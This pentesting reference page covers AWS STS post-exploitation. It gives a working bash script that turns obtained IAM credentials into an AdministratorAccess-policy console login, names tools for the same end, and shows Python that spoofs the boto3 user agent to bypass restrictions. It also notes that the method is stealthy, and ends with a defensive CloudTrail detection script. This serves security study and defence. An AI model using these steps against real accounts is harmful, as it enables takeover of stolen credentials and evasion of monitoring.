# AWS - STS Post Exploitation

{{#include ../../../../banners/hacktricks-training.md}}

## STS

For more information:

{{#ref}}
../../aws-services/aws-iam-enum.md
{{#endref}}

### From IAM Creds to Console

If you have managed to obtain some IAM credentials you might be interested in **accessing the web console** using the following tools.\
Note that the user/role must have the permission **`sts:GetFederationToken`**.

#### Custom script

The following script will use the default profile and a default AWS location (not gov and not cn) to give you a signed URL you can use to log in to the web console:

```bash
# Get federated creds (you must indicate a policy or they won't have any perms)
## Even if you don't have Admin access you can indicate that policy to make sure you get all your privileges
## Don't forget to use [--profile ] in the first line if you need to
output=$(aws sts get-federation-token --name consoler --policy-arns arn=arn:aws:iam::aws:policy/AdministratorAccess)
status=$?
if [ $status -ne 0 ]; then
  echo "The command 'aws sts get-federation-token --name consoler' failed with exit status $status"
  exit $status
fi

# Parse the output
session_id=$(echo "$output" | jq -r '.Credentials.AccessKeyId')
session_key=$(echo "$output" | jq -r '.Credentials.SecretAccessKey')
session_token=$(echo "$output" | jq -r '.Credentials.SessionToken')

# Construct the JSON credentials string
json_creds="{\"sessionId\":\"$session_id\",\"sessionKey\":\"$session_key\",\"sessionToken\":\"$session_token\"}"

# Define the AWS federation endpoint
federation_endpoint="https://signin.aws.amazon.com/federation"

# Make the HTTP request to get the sign-in token
resp=$(curl -s "$federation_endpoint" \
  --get \
  --data-urlencode "Action=getSigninToken" \
  --data-urlencode "SessionDuration=43200" \
  --data-urlencode "Session=$json_creds")
signin_token=$(echo -n "$resp" | jq -r '.SigninToken' | tr -d '\n' | jq -sRr @uri)

# Give the URL to login
echo -n "https://signin.aws.amazon.com/federation?Action=login&Issuer=example.com&Destination=https%3A%2F%2Fconsole.aws.amazon.com%2F&SigninToken=$signin_token"
```

#### aws_consoler

You can **generate a web console link** with [https://github.com/NetSPI/aws_consoler](https://github.com/NetSPI/aws_consoler).

```bash
cd /tmp
python3 -m venv env
source ./env/bin/activate
pip install aws-consoler
aws_consoler [params...] # This will generate a link to login into the console
```

> [!WARNING]
> Ensure the IAM user has `sts:GetFederationToken` permission, or provide a role to assume.

#### aws-vault

[**aws-vault**](https://github.com/99designs/aws-vault) is a tool to securely store and access AWS credentials in a development environment.

```bash
aws-vault list
aws-vault exec jonsmith -- aws s3 ls # Execute aws cli with jonsmith creds
aws-vault login jonsmith # Open a browser logged as jonsmith
```

> [!NOTE]
> You can also use **aws-vault** to obtain a **browser console session**

### **Bypass User-Agent restrictions from Python**

If there is a **restriction to perform certain actions based on the user agent** used (like restricting the use of the python boto3 library based on the user agent) it's possible to use the previous technique to **connect to the web console via a browser**, or you could directly **modify the boto3 user-agent** by doing:

```python
# Shared by ex16x41
import boto3

# Create a client
session = boto3.Session(profile_name="lab6")
client = session.client("secretsmanager", region_name="us-east-1")

# Change user agent of the client (the before-call hook edits the request headers)
client.meta.events.register(
    'before-call.secretsmanager.GetSecretValue',
    lambda params, **kwargs: params['headers'].update({'User-Agent': 'my-custom-tool'})
)

# Perform the action
response = client.get_secret_value(SecretId="flag_secret")
print(response['SecretString'])
```

### **`sts:GetFederationToken`**

With this permission it's possible to create a federated identity for the user executing it, limited to the permissions that this user has.

```bash
aws sts get-federation-token --name
```

The token returned by `sts:GetFederationToken` belongs to the federated identity of the calling user, but with restricted permissions. Even if the user has administrator rights, certain actions such as listing IAM users or attaching policies cannot be performed through the federated token. Additionally, this method is somewhat more stealthy: the federated user does not appear in the AWS Portal, so it can only be observed through CloudTrail logs or monitoring tools.
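Since the page notes that federated users only show up in CloudTrail, here is an added detection example (not code from this page or from any tool it references) that correlates `GetFederationToken` calls with a later `ConsoleLogin` by the resulting `FederatedUser` identity and flags broad policies and unexpected user agents. The sample records are constructed, and the field layout and the `EXPECTED_AGENTS` allowlist are assumptions to adapt to your own account.

```python
import json
from collections import defaultdict

# Constructed sample CloudTrail records (not from a real account): a GetFederationToken
# call with a broad policy, then a console login by the resulting federated user.
SAMPLE_EVENTS = [
    {"eventSource": "sts.amazonaws.com", "eventName": "GetFederationToken",
     "userIdentity": {"type": "IAMUser", "userName": "alice"},
     "requestParameters": {"name": "consoler",
                           "policyArns": [{"arn": "arn:aws:iam::aws:policy/AdministratorAccess"}]},
     "userAgent": "my-custom-tool", "sourceIPAddress": "203.0.113.10"},
    {"eventSource": "signin.amazonaws.com", "eventName": "ConsoleLogin",
     "userIdentity": {"type": "FederatedUser",
                      "arn": "arn:aws:sts::111122223333:federated-user/consoler",
                      "sessionContext": {"sessionIssuer": {"type": "IAMUser", "userName": "alice"}}},
     "userAgent": "Mozilla/5.0", "sourceIPAddress": "203.0.113.10"},
    {"eventSource": "s3.amazonaws.com", "eventName": "ListBuckets",
     "userIdentity": {"type": "IAMUser", "userName": "bob"},
     "userAgent": "aws-cli/2.15.0", "sourceIPAddress": "198.51.100.7"},
]

# Assumption: the SDK/CLI user agents normally seen in this account.
EXPECTED_AGENTS = ("aws-cli/", "Boto3/", "aws-sdk-")

def analyze_events(events):
    """Return findings for GetFederationToken calls and federated console logins."""
    findings = []
    issuers = defaultdict(list)  # federated name -> IAM users who minted a token for it
    for ev in events:
        ident = ev.get("userIdentity", {})
        if ev.get("eventName") == "GetFederationToken":
            rp = ev.get("requestParameters", {})
            name = rp.get("name", "?")
            issuers[name].append(ident.get("userName"))
            arns = [p["arn"] for p in rp.get("policyArns", [])]
            reasons = []
            if any(a.endswith("/AdministratorAccess") for a in arns):
                reasons.append("broad policy on federated token")
            if not ev.get("userAgent", "").startswith(EXPECTED_AGENTS):
                reasons.append(f"unexpected user agent {ev.get('userAgent')!r}")
            findings.append({"rule": "federation_token", "user": ident.get("userName"),
                             "federated_name": name, "reasons": reasons})
        elif ev.get("eventName") == "ConsoleLogin" and ident.get("type") == "FederatedUser":
            # Console logins normally come from IAM users or assumed roles, not federated users
            name = ident.get("arn", "").rsplit("/", 1)[-1]
            findings.append({"rule": "federated_console_login", "federated_name": name,
                             "minted_by": issuers.get(name, []), "ip": ev.get("sourceIPAddress")})
    return findings

if __name__ == "__main__":
    print(json.dumps(analyze_events(SAMPLE_EVENTS), indent=2))
```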